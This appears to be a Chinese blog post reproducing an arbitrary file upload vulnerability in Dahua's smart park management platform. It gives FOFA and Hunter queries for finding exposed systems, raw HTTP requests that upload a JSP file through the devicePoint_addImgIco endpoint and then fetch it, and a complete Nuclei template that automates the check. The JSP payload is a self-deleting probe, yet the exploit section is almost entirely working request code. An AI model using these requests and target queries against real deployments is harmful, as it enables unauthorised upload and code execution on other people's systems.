【漏洞复现】大华-智慧园区综合管理平台-devicePoint_addImgIco-任意文件上传
发布时间
阅读量:
阅读量
目录
免责声明
0x01 产品简介
0x02 漏洞概述
0x03 网络测绘
0x04 漏洞复现
0x05 Nuclei
免责声明
此内容仅限于用于技术交流和学习目的,请避免在未经授权的情况下使用。请遵守相关法律法规及道德准则。对于因使用本文所述技术可能产生的法律责任,本声明明确表示与本文作者及发布平台无关。如遇任何内容争议或侵权情况,请第一时间联系我们的客服处理。
此内容仅限于用于技术交流和学习目的,请避免在未经授权的情况下使用。请遵守相关法律法规及道德准则。对于因使用本文所述技术可能产生的法律责任, 本声明明确表示与本文作者及发布平台无关。如遇任何内容争议或侵权情况, 请第一时间联系我们的客服处理
0x01 产品简介
大华智慧园区综合管理平台是一款整合了云计算、大数据以及人工智能等技术的应用方案。该平台具备运营管理和综合安防两大核心功能,并提供便捷通行和协同办公辅助服务。通过提高园区的安全等级和效率水平,并降低相关管理成本。
0x02 漏洞概述
大华智慧园区综合管理平台提供接口 devicePoint_addImgIco 供攻击者构造特定请求包用于任意文件上传。该漏洞导致攻击者可在受感染设备上上传恶意文件。潜在威胁包括运行恶意代码、访问敏感数据以及执行其他危害操作。通过上传恶意文件可能被利用导致严重后果。
0x03 网络测绘
fofa-query: app="dahua-智慧园区综合管理平台"
hunter-query: web.body="/WPMS/asset/lib/json2.js"0x04 漏洞复现
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
Content-Length: 273
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
--e00b34d08d13639f8b619829b04c1a29
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: image/gif
<%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--e00b34d08d13639f8b619829b04c1a29--
GET /upload/emap/society_new/ico_res_5b4f6b2068b1_on.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: gzip0x05 Nuclei
id: dahua-WPMS-addimgico-upload
info:
name: 大华-智慧园区综合管理平台-devicePoint_addImgIco-任意文件上传
author: rain
severity: high
metadata:
fofa-query: app="dahua-智慧园区综合管理平台"
hunter-query: web.body="/WPMS/asset/lib/json2.js"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 177
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
--e00b34d08d13639f8b619829b04c1a29
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: image/gif
<%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--e00b34d08d13639f8b619829b04c1a29--
- |
GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: name
json:
- ".data"
internal: true
matchers:
- type: dsl
dsl:
- contains(body_2,"12321") && status_code==200全部评论 (0)
还没有任何评论哟~